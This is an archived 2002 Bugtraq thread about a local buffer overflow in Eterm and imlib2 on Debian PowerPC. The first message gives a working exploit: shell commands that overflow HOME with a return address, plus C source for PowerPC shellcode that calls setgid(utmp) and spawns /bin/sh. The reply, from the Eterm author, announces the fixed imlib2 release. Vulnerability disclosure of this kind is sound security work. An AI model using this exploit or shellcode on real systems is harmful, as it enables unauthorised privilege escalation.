linux, säkerhet

7804773 2002-01-13 07:57 -0700  /88 rader/ Charles 'core' Stevenson <core@bokeoa.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-14  21:17  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Extern kopiemottagare: vuln-dev@securityfocus.com <vuln-dev@securityfocus.com>
Externa svar till: core@bokeoa.com
Mottagare: Bugtraq (import) <20510>
Ärende: Eterm SGID utmp Buffer Overflow (Local)
------------------------------------------------------------
From: Charles 'core' Stevenson <core@bokeoa.com>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Cc: "vuln-dev@securityfocus.com" <vuln-dev@securityfocus.com>
Message-ID: <3C41A075.84B58708@bokeoa.com>

I found this last night looking for suids to overflow.  Tested on
Debian PowerPC Unstable. Yields gid utmp from which higher priveleges
could be gained with a little effort. I haven't looked too close but
I think the overflow might be in imlib2.

[-(core@euclid:/home/core/tmp)> gcc execve.c -o execve
[-(core@euclid:/home/core/tmp)> export EGG=`./execve`
sizeof(shellcode)=73
[-(core@euclid:/home/core/tmp)> ./getenv EGG
Shellcode @ 0x7fffff95                      
[-(core@euclid:/home/core/tmp)> export HOME=`perl -e 'print
"\x7f\xff\xff\x96"x1032'`
[-(core@euclid:/home/core/tmp)> Eterm
sh-2.05a$ id                         
uid=1000(core) gid=1000(core) egid=43(utmp) groups=1000(core)

ii  eterm          0.9.1-2        Enlightened Terminal Emulator
ii  libimlib2      1.0.4-1        Powerful image loading and rendering
library

/* execve.c
 *
 * PowerPC Linux Shellcode
 *
 * by Charles Stevenson <core@bokeoa.com>
 * 
 * original execve by my good friend 
 * Kevin Finisterre  <dotslash@snosoft.com>
 */

#include <stdio.h>

char shellcode[] =
/* setgid(43) utmp */
        "\x38\x60\x01\x37"              /* 100004a0: li     
r3,311             */
        "\x38\x63\xfe\xf4"              /* 100004a4: addi   
r3,r3,-268         */
        "\x3b\xc0\x01\x70"              /* 100004a8: li     
r30,368            */
        "\x7f\xc0\x1e\x70"              /* 100004ac: srawi  
r0,r30,3           */
        "\x44\xff\xff\x02"              /* 100004b0:
sc                         */
/* execve("/bin/sh") */
        "\x7c\xa5\x2a\x78"              /* 100004b0: xor       
r5,r5,r5        */
        "\x40\x82\xff\xed"              /* 100004b4: bnel+      100004a0
<main> */
        "\x7f\xe8\x02\xa6"              /* 100004b8: mflr      
r31             */
        "\x3b\xff\x01\x30"              /* 100004bc: addi      
r31,r31,304     */
        "\x38\x7f\xfe\xf4"              /* 100004c0: addi      
r3,r31,-268     */
        "\x90\x61\xff\xf8"              /* 100004c4: stw       
r3,-8(r1)       */
        "\x90\xa1\xff\xfc"              /* 100004c8: stw       
r5,-4(r1)       */
        "\x38\x81\xff\xf8"              /* 100004cc: addi      
r4,r1,-8        */
        "\x3b\xc0\x01\x60"              /* 100004d0: li        
r30,352         */
        "\x7f\xc0\x2e\x70"              /* 100004d4: srawi     
r0,r30,5        */
        "\x44\xff\xff\x02"              /* 100004d8:
sc                         */
        "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi     
cr6,r2,26990    */
        "\x2f\x73\x68\x00";             /* 100004e0: cmpdi     
cr6,r19,26624   */

int main(int argc, char **argv) {
   fprintf(stderr,"sizeof(shellcode)=%d\n",sizeof(shellcode));
   //__asm__("b shellcode");
   printf("%s",shellcode);
   return 0;
}

Best Regards,
Charles 'core' Stevenson
(7804773) /Charles 'core' Stevenson <core@bokeoa.com>/(Ombruten)
Kommentar i text 7857757 av Michael Jennings <mej@kainx.org>
7857757 2002-01-21 14:24 -0500  /38 rader/ Michael Jennings <mej@kainx.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-21  22:36  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Extern mottagare: vuln-dev@securityfocus.com <vuln-dev@securityfocus.com>
Mottagare: Bugtraq (import) <20606>
Kommentar till text 7804773 av Charles 'core' Stevenson <core@bokeoa.com>
Ärende: Re: Eterm SGID utmp Buffer Overflow (Local)
------------------------------------------------------------
From: Michael Jennings <mej@kainx.org>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
 "vuln-dev@securityfocus.com" <vuln-dev@securityfocus.com>
Message-ID: <20020121192437.GA16555@kainx.org>

On Sunday, 13 January 2002, at 07:57:57 (-0700),
Charles 'core' Stevenson wrote:

> I found this last night looking for suids to overflow.  Tested on
> Debian PowerPC Unstable. Yields gid utmp from which higher
> priveleges could be gained with a little effort. I haven't looked
> too close but I think the overflow might be in imlib2.

Imlib2 1.0.5 has been released to fix this bug.  The source tarball
may be downloaded immediately from:

http://prdownloads.sourceforge.net/enlightenment/

The SRPM and i386 binary RPM's may also be downloaded from this
location, and I believe Debian unstable should already have the new
package as of last night's update.

My apologies to PPC users directly affected by this, but Apple has yet
to donate a PowerMac to the cause, so I can't build PPC RPM's.... :-)

Thanks to Mr. Stevenson for locating this problem and for verifying
the fix.

Regards,
Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  <mej@kainx.org>
n+1, Inc., http://www.nplus1.net/         Author, Eterm (www.eterm.org)
-----------------------------------------------------------------------
 "Sorry, but my karma just ran over your dogma."            -- Unknown
(7857757) /Michael Jennings <mej@kainx.org>/--------